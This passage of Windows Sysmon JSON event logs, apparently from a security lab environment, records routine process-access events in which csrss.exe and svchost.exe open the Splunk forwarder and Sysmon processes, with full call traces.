Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6488,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:50.198\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-045E-5F25-0000-0010A85C0C00}\r\nTargetProcessId: 3380\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:50.198","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-045E-5F25-0000-0010A85C0C00}","TargetProcessId":"3380","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:57:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6489,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:50.198\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:50.198","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6490,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:50.198\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:50.198","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6491,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:50.198\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:50.198","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6492,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:50.198\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:50.198","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6493,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:50.198\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:50.198","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6494,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:50.198\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:50.198","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6495,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:50.198\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:50.198","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
